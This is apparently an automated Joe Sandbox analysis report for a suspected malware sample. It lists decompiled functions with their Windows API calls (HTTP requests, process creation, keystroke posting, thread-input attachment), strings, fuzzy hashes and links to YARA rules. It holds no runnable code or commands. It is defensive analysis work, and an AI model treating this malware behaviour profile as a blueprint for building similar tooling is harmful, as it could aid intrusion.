Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: b3f7b814ae29dbffd2ded54699056dacc408d1e4613ccf80308f6178596b66d4
Instruction ID: 35a8ae2a5377c679ed6e109ed3a7e6f3a7b2c200482bbe95f2fbbb54a8119644
Opcode Fuzzy Hash: b3f7b814ae29dbffd2ded54699056dacc408d1e4613ccf80308f6178596b66d4
Instruction Fuzzy Hash: 3F21D670A00249BBEF15ABB1CC85EFEBB75EF49320F100119F961972A1DB7D5819EB20

Function 00FE907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FE90FD
GetDlgCtrlID.USER32 ref: 00FE9108
GetParent.USER32 ref: 00FE9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00FE9127
GetDlgCtrlID.USER32(?), ref: 00FE9130
GetParent.USER32(?), ref: 00FE914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00FE914F

Strings

ListBox, xrefs: 00FE90BC
ComboBox, xrefs: 00FE9087

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 78ffcd13ec4f5b480f0b0c096bda63554e50e1ac84b985baee0520b7863c243a
Instruction ID: 26b3d98e236b1ea682a1c1338351373c0b4712d7b7b8e9414ecd0491b2a4f669
Opcode Fuzzy Hash: 78ffcd13ec4f5b480f0b0c096bda63554e50e1ac84b985baee0520b7863c243a
Instruction Fuzzy Hash: 3321C575A00249BBEF11ABB5CC85EFEBB74EF48310F10401AF951972A5DB7D9819EB20

Function 00FE9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00FE916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00FE9184
_wcscmp.LIBCMT ref: 00FE9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FE9211

Strings

details, xrefs: 00FE91BF
largeicons, xrefs: 00FE91A5
smallicons, xrefs: 00FE91D9
list, xrefs: 00FE91F3
SHELLDLL_DefView, xrefs: 00FE9190

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 23dde4f7b6bcdef3b7f9b15404952a2abf49b1473f7af0a607e4abcb9443539b
Instruction ID: ca9b8b35c7cbdcdfb4a131ff1baef725e98acdc623e09509a977603870a25b6f
Opcode Fuzzy Hash: 23dde4f7b6bcdef3b7f9b15404952a2abf49b1473f7af0a607e4abcb9443539b
Instruction Fuzzy Hash: A5110A7B64C387BAFE212527DC06DE7379C9B15730B200426FA00E4095FFAA9D517A64

Function 010088AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 010088D7
CoInitialize.OLE32(00000000), ref: 01008904
CoUninitialize.OLE32 ref: 0100890E
GetRunningObjectTable.OLE32(00000000,?), ref: 01008A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 01008B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01022C0C), ref: 01008B6F
CoGetObject.OLE32(?,00000000,01022C0C,?), ref: 01008B92
SetErrorMode.KERNEL32(00000000), ref: 01008BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01008C25
VariantClear.OLEAUT32(?), ref: 01008C35

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 1b9257ffddbe9a671e866a616662a674c5624c1f28dc26d61679a6492bdece1b
Instruction ID: 1eb0bcdebec701b4bd18a4d792d37115b02f0c81e9d00088a5dbda56ee35519a
Opcode Fuzzy Hash: 1b9257ffddbe9a671e866a616662a674c5624c1f28dc26d61679a6492bdece1b
Instruction Fuzzy Hash: BAC148B16083059FE701EF68C88492BB7E9FF89348F00495DF9899B291DB75ED05CB52

Function 00FF7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00FF7A6C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: c7ed4957de40d09f7e5b80856a7fff4f42dc97db411e874939ff5eeb48807ecf
Instruction ID: 0763365a82c64bfea936a21a1fcb3c93b24d8e04bc3608ffe20d0a7ae0921a97
Opcode Fuzzy Hash: c7ed4957de40d09f7e5b80856a7fff4f42dc97db411e874939ff5eeb48807ecf
Instruction Fuzzy Hash: 0CB19F7190830E9FDB10EF94D884BBEF7B4EF49321F144029E651E72A1D778A941EB90

Function 00FF11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FF11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF1204
GetWindowThreadProcessId.USER32(00000000), ref: 00FF120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FF122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FF0268,?,00000001), ref: 00FF12BC

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2ec54cc4af344b4b5d2d5eb813e796a4bf6ebdca25b5ac32cacb473c3c153190
Instruction ID: 8d441fb9567248d51bca217339d2fec8617616d9e959fbc1a49a659b8edaab68
Opcode Fuzzy Hash: 2ec54cc4af344b4b5d2d5eb813e796a4bf6ebdca25b5ac32cacb473c3c153190
Instruction Fuzzy Hash: D131AC75A00308EBDB30DFA4E888B7A37A9BF58331F504215FA45C61A5D77A9D44AB60

Function 00F9FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F9FAA6
OleUninitialize.OLE32(?,00000000), ref: 00F9FB45
UnregisterHotKey.USER32(?), ref: 00F9FC9C
DestroyWindow.USER32(?), ref: 00FD45D6
FreeLibrary.KERNEL32(?), ref: 00FD463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD4668

Strings

close all, xrefs: 00F9FAA1

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 9dda68605da67cff568523bdddd94cc9cb0293f60d52df6c6574f906226567c9
Instruction ID: 72e14bb778486a20eff08f226b6b6f634ecaf4a16eb3db3f59d088f6fc0c69f3
Opcode Fuzzy Hash: 9dda68605da67cff568523bdddd94cc9cb0293f60d52df6c6574f906226567c9
Instruction Fuzzy Hash: 63A16C31B01212CFDB29EF14C995B69F365BF05710F5442ADE80AAB251DB34ED1AEF50

Function 00FEA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00FEA439), ref: 00FEA377

Strings

CLASS, xrefs: 00FEA0F6
CLASSNN, xrefs: 00FEA119
REGEXPCLASS, xrefs: 00FEA13C
INSTANCE, xrefs: 00FEA285
NAME, xrefs: 00FEA1A9
TEXT, xrefs: 00FEA2AE

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 6d466a1256f63c982fe0557be9c10433a0bb9119154755b6f98b1de136ae57ef
Instruction ID: aeb950982b39f0b20f42b55e14420cb03763fd3a8c63a408c5af5b2f3ac43bb2
Opcode Fuzzy Hash: 6d466a1256f63c982fe0557be9c10433a0bb9119154755b6f98b1de136ae57ef
Instruction Fuzzy Hash: 2791F631A00646AFDB18EFA1C881BEEFB74FF04310F548119E959A3141DF357999EBA1

Function 00F92E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00F92EAE

Part of subcall function 00F91DB3: GetClientRect.USER32(?,?), ref: 00F91DDC
Part of subcall function 00F91DB3: GetWindowRect.USER32(?,?), ref: 00F91E1D
Part of subcall function 00F91DB3: ScreenToClient.USER32(?,?), ref: 00F91E45

GetDC.USER32 ref: 00FCCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FCCD45
SelectObject.GDI32(00000000,00000000), ref: 00FCCD53
SelectObject.GDI32(00000000,00000000), ref: 00FCCD68
ReleaseDC.USER32(?,00000000), ref: 00FCCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FCCDFB

Strings

U, xrefs: 00FCCCD0

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 291b5a1decd251c84fadcb8e27bcaca8681cf55fa2ad682ba2e4daddd563eb22
Instruction ID: 89e04ed438552d6979e47e83fdee9790643d27e1085a98ae6a7a86135a9c8bf3
Opcode Fuzzy Hash: 291b5a1decd251c84fadcb8e27bcaca8681cf55fa2ad682ba2e4daddd563eb22
Instruction Fuzzy Hash: 4A71E431900206EFDF21DF64C981FAA7BB5FF49320F14426EED9A5A255D7358C41EBA0

Function 01001A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01001A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01001A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 01001ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01001AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01001AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01001B10
InternetCloseHandle.WININET(00000000), ref: 01001B57

Part of subcall function 01002483: GetLastError.KERNEL32(?,?,01001817,00000000,00000000,00000001), ref: 01002498
Part of subcall function 01002483: SetEvent.KERNEL32(?,?,01001817,00000000,00000000,00000001), ref: 010024AD

Strings

, xrefs: 01001B01

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: c5ffe565d4e478f97824eada3153ad0202d20ec5691f9f9976e648c1f4a8c154
Instruction ID: 4eef0267939989f042fda04ba3a159d518bd4f58c301ae9fe2c9e3c42381dfb7
Opcode Fuzzy Hash: c5ffe565d4e478f97824eada3153ad0202d20ec5691f9f9976e648c1f4a8c154
Instruction Fuzzy Hash: DA416DB1500619BFFB129F54CC89FFA7BACFF08354F004156FA859A181EBB5DA448BA0

Function 01008C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0101F910), ref: 01008D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0101F910), ref: 01008D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01008ED6
SysFreeString.OLEAUT32(?), ref: 01008F00

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 2dfe0cc510389d4bab262fdaf53a0ec8da1d4d3fd23b7c390a76230ee749fc29
Instruction ID: 79c1dfda496a844a400352f512c5e9ba662e5b357b63b85e37cfd64967d0aa7d
Opcode Fuzzy Hash: 2dfe0cc510389d4bab262fdaf53a0ec8da1d4d3fd23b7c390a76230ee749fc29
Instruction Fuzzy Hash: 6BF17F71A00209EFEF15DF98C884EAEB7B9FF45314F108499F945AB291DB31AE45CB50

Function 0100F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0100F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0100F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0100F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0100F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0100F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0100FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0100FA7C
CloseHandle.KERNEL32(?), ref: 0100FAAB
CloseHandle.KERNEL32(?), ref: 0100FB22

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 162f522051fc6609eadaf8b236d8cb0e57ab327ad47fe41c91895ccc1252581a
Instruction ID: c1de27cff8fc3f77f88a7370e156b4feb2e2404dc7d83b945adadb2718b19511
Opcode Fuzzy Hash: 162f522051fc6609eadaf8b236d8cb0e57ab327ad47fe41c91895ccc1252581a
Instruction Fuzzy Hash: 1DE1E4312043019FEB25EF29C881A6ABBE0FF85350F04855DF9C98B2A1CB35DD45EB52

Function 00FF4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF3697,?), ref: 00FF468B

Part of subcall function 00FF466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF3697,?), ref: 00FF46A4

Part of subcall function 00FF4A31: GetFileAttributesW.KERNEL32(?,00FF370B), ref: 00FF4A32

lstrcmpiW.KERNEL32(?,?), ref: 00FF4D40
_wcscmp.LIBCMT ref: 00FF4D5A
MoveFileW.KERNEL32(?,?), ref: 00FF4D75

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 933a5c88060df45c138b440c36510fe1b8197e523363f524fe6e96659de2f13d
Instruction ID: 552ffba259fea6f9b382a7a4abf3087e71462a694e77ae9ce4c08ab8041d6c68
Opcode Fuzzy Hash: 933a5c88060df45c138b440c36510fe1b8197e523363f524fe6e96659de2f13d
Instruction Fuzzy Hash: 515155B24083499BD725DB64DC819EFB3ECAF84350F00091EB289D3151EE79B688DB66

Function 01018645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010186FF

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: efc721d07ae5271be2e63c3b6443ca9c2e8219c59f3dbbb3cd52ef17068d2e98
Instruction ID: ad6ddd487a8113c9c082ff2270db7e466865288e517b6a270e7299fbdb99ed7b
Opcode Fuzzy Hash: efc721d07ae5271be2e63c3b6443ca9c2e8219c59f3dbbb3cd52ef17068d2e98
Instruction Fuzzy Hash: C151B430500205BEEF609B28DC84FAD3BA5BB09750F208553FAD0E61A9D77EE750CB50

Function 00F92B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FCC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FCC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FCC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FCC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FCC370
DestroyIcon.USER32(00000000), ref: 00FCC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FCC39C
DestroyIcon.USER32(?), ref: 00FCC3AB

Part of subcall function 0101A4AF: DeleteObject.GDI32(00000000), ref: 0101A4E8

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 6676219c3902c528be86339a11e9bb244b47f34e5eb0b0a1f1107cf72901973e
Instruction ID: 3ec7c350d8542252ad99b8023298fa42911e7cb1404f7beb4ce7943b254bd2d9
Opcode Fuzzy Hash: 6676219c3902c528be86339a11e9bb244b47f34e5eb0b0a1f1107cf72901973e
Instruction Fuzzy Hash: 1B514971A0020AAFEF24DF64DC45FAA7BE5FB58320F104518F946E7290DB75AD50EB90

Function 00FE966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEA84C
Part of subcall function 00FEA82C: GetCurrentThreadId.KERNEL32 ref: 00FEA853
Part of subcall function 00FEA82C: AttachThreadInput.USER32(00000000,?,00FE9683,?,00000001), ref: 00FEA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00FE968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FE96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FE96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00FE96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FE96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FE96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00FE96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FE96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FE96FB

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
